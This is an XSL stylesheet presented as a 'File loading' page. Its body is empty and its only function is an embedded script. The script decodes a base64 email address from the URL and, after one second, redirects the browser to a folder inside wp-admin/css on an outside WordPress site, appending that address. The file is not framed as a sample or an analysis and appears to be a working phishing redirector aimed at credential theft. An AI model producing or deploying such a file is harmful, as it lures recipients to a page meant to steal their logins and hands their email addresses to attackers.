<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
    <xsl:template match="/">
        <html lang="en">
            <head>
                <meta charset="UTF-8"/>
                <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
                <title>File loading</title>
                <script>
                    <![CDATA[
                        // Function to get the value of a parameter from the URL
                        function getParameterByName(name, url) {
                            if (!url) url = window.location.href;
                            name = name.replace(/[\[\]]/g, "\\$&");
                            var regex = new RegExp("[?&]" + name + "(=([^&#]*)|&|#|$)"),
                                results = regex.exec(url);
                            if (!results) return null;
                            if (!results[2]) return '';
                            return decodeURIComponent(results[2].replace(/\+/g, " "));
                        }
                        var base64EmailParam = getParameterByName('email');
                        function decodeEmail(base64Email) {
                            return atob(base64Email);
                        }
                        if (base64EmailParam) {
                            var email = decodeEmail(base64EmailParam);
                            setTimeout(function () {
                                window.location.href = 'https://legaladmin.co.za/wp-admin/css/Fixed/?uid=' + email;
                            }, 1000);
                        }
                    ]]>
                </script>
            </head>
            <body>
            </body>
        </html>
    </xsl:template>
</xsl:stylesheet>
